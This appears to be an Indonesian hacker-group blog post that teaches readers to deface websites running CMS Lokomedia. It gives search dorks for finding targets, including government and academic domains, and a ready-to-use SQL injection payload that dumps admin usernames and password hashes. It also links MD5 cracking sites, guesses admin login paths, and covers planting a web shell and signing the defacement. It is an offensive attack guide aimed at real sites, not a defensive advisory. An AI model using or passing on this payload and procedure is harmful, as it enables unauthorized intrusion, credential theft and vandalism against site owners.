Tutorial Deface SQLi CMS Lokomedia
Berbicara soal teknik SQLi CMS Lokomedia ini, pasti sudah kesohor di kalangan defacer/hacker tanah air. Terlebih lagi sekarang ini yg semakin banyak defacer yang mengexploit CMS Lokomedia ini. Ga usah panjang lebar langsung ke topik pembahasan yaitu "Tutorial Deface SQLi CMS Lokomedia"
Bahan :
1. Dork :
inurl:statis-1-profil.html
inurl:statis-2-profil.html
inurl:statis-3-strukturorganisasi.html
Note : tambahkan site:org site:net :site:go.id site:ac.id site:id
(Use Your Brain)
2. Exploit SQLi (SQL Injection) :
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Bingung cara ngexploit nya ?? sini di kasih tau :v
contoh :
http://sitepemerintah.co.li/statis-2-profil.html
kamu tambahin exploit nya sesudah angka jadi kaya gini :
ngerti kan ??
3. MD5 Decrypter :
MD5 Decrypt nya pake otak kamu sendiri aja :v tenang ada tool online nya kokhttps://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/
Tutorial :
1. Dorking pake dork di atas,2. Cari targetnya, setelah ketemu masukin inject nya ! seperti contoh di atas
3. Jika Vuln akan ada kode MD5 di tab bar (liat gambar aja biar jelas)
4. Lalu kamu pencet CTRL+U lalu kamu copykan kode MD5 tersebut, lalu decrypt di MD5 Decrypter
5. Tinggal cari dimana tempat login admin nya :) biasanya ada di :
http://target-suka.co.li/admin/
http://target-suka.co.li/adminweb/
http://target-suka.co.li/admininistrator/
6. Untuk Nanem shell ?? User Your Brain Kids !! (Jgn mau nya di suapin mulu)
7. Akses shell ?? setelah nanem shell klik kanan gambar yang ancur lalu klik view image
8. Jangan lupa nitip nick _Tuan2Fay_ - Yukinoshita 47 - Snooze - TM_404 - Geonyc X - Kinekaru
Note : tapi saya sarankan sebelum melakukan inject terhadap target, lebih baik cari dlu login adminnya :)
Karena CMS Lokomedia ini dipakai oleh web indonesia, mohon bantuan untuk tidak merusak !!
Hargai Para webmaster tanah air ini
Mohon maaf kaga ada gambar nya, karna saat saya eksekusi target saya lupa di screenshots :'v
kalo mau lihat hasil nya ==> http://goo.gl/ksWGlA
Sekiranya sahabat blogger untuk menambahkan facebook admin sebagai teman dan menyukai fanspage nya. Saya sgt berterima kasih
Link fb dan facebook klik gambar berikut :
Garuda Security Hacker | No Army Can Stop Our Idea
0 Comments